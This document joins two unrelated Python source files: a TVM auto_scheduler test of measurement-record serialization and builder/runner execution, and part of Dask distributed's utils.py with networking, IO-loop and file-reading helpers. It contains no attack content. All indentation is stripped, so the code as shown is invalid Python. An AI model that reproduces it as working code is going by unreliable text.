# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Test measurement and log serialization. """
import multiprocessing
import tvm
from tvm import topi
from tvm import te, auto_scheduler
import tempfile
import tvm.testing
from test_auto_scheduler_common import matmul_auto_scheduler_test, get_tiled_matmul
def record_common(dag, s):
target = tvm.target.Target("llvm")
task = auto_scheduler.SearchTask(compute_dag=dag, workload_key="test", target=target)
inp = auto_scheduler.measure.MeasureInput(task, s)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
# Test in-memory record processing.
record_str = auto_scheduler.measure_record.dump_record_to_string(inp, res)
r_inp, r_res = auto_scheduler.measure_record.load_record_from_string(record_str)
# Only check the workload_key for simplification.
assert inp.task.workload_key == r_inp.task.workload_key
assert str(res) == str(r_res)
# Test file-based record processing.
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
s1 = dag.infer_bound_from_state(s)
s2 = dag.infer_bound_from_state(inputs[0].state)
assert s1 == s2
assert not (s1 == dag.get_init_state())
def test_record_split_reorder_fuse_annotation():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Split
its0 = s.split(C, s[C].iters[0], [4, 8, 8])
its1 = s.split(C, s[C].iters[4], [8, 4, 4])
# Reorder
s.reorder(
C, [its0[0], its1[0], its0[1], its1[1], its0[2], its1[2], its0[3], s[C].iters[8], its1[3]]
)
# Fuse
s.fuse(C, [s[C].iters[0], s[C].iters[1], s[C].iters[2]])
# Parallel
s.parallel(C, s[C].iters[0])
# Thread bind(The blockIdx & threadIdx are used in GPU, just for record testing here)
s.bind(C, s[C].iters[1], "blockIdx.x")
s.bind(C, s[C].iters[2], "threadIdx.z")
s.bind(C, s[C].iters[3], "vthread")
# Unroll
s.unroll(C, s[C].iters[4])
# Vectorize
s.vectorize(C, s[C].iters[6])
record_common(dag, s)
def test_record_compute_at_root_inline_cache_read_write():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
AA = topi.nn.relu(A)
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(AA[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Cache Write
C_shared = s.cache_write(C, "shared")
# Compute At
s.compute_at(C_shared, C, s[C].iters[0])
# Cache Read
B_global = s.cache_read(B, "global", [C_shared])
s.compute_at(B_global, C_shared, s[C_shared].iters[2])
# Compute Inline
s.compute_inline(AA)
# Compute Root
s.compute_root(C_shared)
record_common(dag, s)
def test_record_follow_split_follow_fused_split():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
D = topi.nn.relu(C)
E = topi.nn.relu(D)
dag = auto_scheduler.ComputeDAG([A, B, E])
s = dag.get_init_state()
# Follow Split
s.split(C, s[C].iters[0], [4, 2, 8, 4], True)
split_step0 = len(s.transform_steps) - 1
s.follow_split(C, s[C].iters[5], split_step0, 4)
# Follow Fused Split
its0 = s.split(E, s[E].iters[0], [4, 2, 8, 4], True)
split_step1 = len(s.transform_steps) - 1
its1 = s.split(E, s[E].iters[5], [2, 4, 2, 4], True)
split_step2 = len(s.transform_steps) - 1
its = []
for i0, i1 in zip(its0, its1):
its.append(i0)
its.append(i1)
for i in range(0, 5):
s.fuse(E, [s[E].iters[i], s[E].iters[i + 1]])
s.follow_fused_split(D, s[D].iters[0], [split_step1, split_step2], 2, True)
record_common(dag, s)
def test_record_pragma_storage_align_rfactor():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Rfactor
ko, _ = s.split(C, s[C].iters[2], [16])
s.rfactor(C, ko, 2)
# Pragma
s.pragma(C, s[C].iters[0], "auto_unroll_max_step$64")
# StorageAlign
s.storage_align(C, s[C].iters[-1], 8, 4)
record_common(dag, s)
def test_recover_measure_input():
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
raw_inp = inputs[0]
correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp)
assert str(correct_inp.task.compute_dag) == str(inp.task.compute_dag)
correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp, rebuild_state=True)
assert str(correct_inp.state) == str(inp.state)
def test_measure_local_builder_runner():
if not tvm.testing.device_enabled("llvm"):
return
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
local_runner = auto_scheduler.LocalRunner(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = local_runner.run([minp], bress)
assert mress[0].error_no == 0
def test_measure_local_builder_rpc_runner():
if not tvm.testing.device_enabled("llvm"):
return
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
measure_ctx = auto_scheduler.LocalRPCMeasureContext(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
rpc_runner = measure_ctx.runner
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = rpc_runner.run([minp], bress)
assert mress[0].error_no == 0
del measure_ctx
def measure_local_builder_rpc_runner_spawn():
assert multiprocessing.get_start_method(False) == "spawn"
test_measure_local_builder_rpc_runner()
@tvm.testing.requires_llvm
def test_measure_local_builder_rpc_runner_spawn():
ctx = multiprocessing.get_context("spawn")
p = ctx.Process(target=measure_local_builder_rpc_runner_spawn)
p.start()
p.join()
@tvm.testing.requires_llvm
def test_measure_target_host():
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test,
args=(512, 512, 512),
target="llvm",
target_host="llvm -mtriple=aarch64-linux-gnu",
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
raw_inp = inputs[0]
recovered_inp = auto_scheduler.measure.recover_measure_input(raw_inp)
assert str(recovered_inp.task.target_host) == str(inp.task.target_host)
if __name__ == "__main__":
test_record_split_reorder_fuse_annotation()
test_record_compute_at_root_inline_cache_read_write()
test_record_follow_split_follow_fused_split()
test_record_pragma_storage_align_rfactor()
test_recover_measure_input()
test_measure_local_builder_runner()
test_measure_local_builder_rpc_runner()
test_measure_target_host()
|
utils.py
|
import asyncio
import functools
import html
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import shutil
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
from typing import Any, Dict, List
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
# Import config serialization functions here for backward compatibility
from dask.config import deserialize as deserialize_for_cli # noqa
from dask.config import serialize as serialize_for_cli # noqa
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa: F401
format_bytes,
format_time,
funcname,
parse_bytes,
parse_timedelta,
)
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
# FIXME: this breaks if changed to async def...
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
"""Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with suppress(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = parse_timedelta(callback_timeout, "s")
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
# We flag the thread state asynchronous, which will make sync() call
# within `func` use async semantic. In order to support concurrent
# calls to sync(), `asynchronous` is used as a ref counter.
thread_state.asynchronous = getattr(thread_state, "asynchronous", 0)
thread_state.asynchronous += 1
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
assert thread_state.asynchronous > 0
thread_state.asynchronous -= 1
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return key_split(x)
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
"""Truncate exception to be about a certain length"""
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
"""Possibly contains a nested task"""
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
try:
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
The object to be converted. Will correctly handled
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
"""Loads modules for a file (.py, .zip, .egg)"""
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
"""Number of bytes of a frame or memoryview"""
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def is_writeable(frame):
"""
Check whether frame is writeable
Will return ``True`` if writeable, ``False`` if readonly, and
``None`` if undetermined.
"""
try:
return not memoryview(frame).readonly
except TypeError:
return None
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def deprecated(*, version_removed: str = None):
"""Decorator to mark a function as deprecated
Parameters
----------
version_removed : str, optional
If specified, include the version in which the deprecated function
will be removed. Defaults to "a future release".
"""
def decorator(func):
nonlocal version_removed
msg = f"{funcname(func)} is deprecated and will be removed in"
if version_removed is not None:
msg += f" version {version_removed}"
else:
msg += " a future release"
@functools.wraps(func)
def wrapper(*args, **kwargs):
warnings.warn(msg, DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
return wrapper
return decorator
def json_load_robust(fn, load=json.load):
"""Reads a JSON file from disk that may be being written as we read"""
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
"""A logging.Handler that records records into a deque"""
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
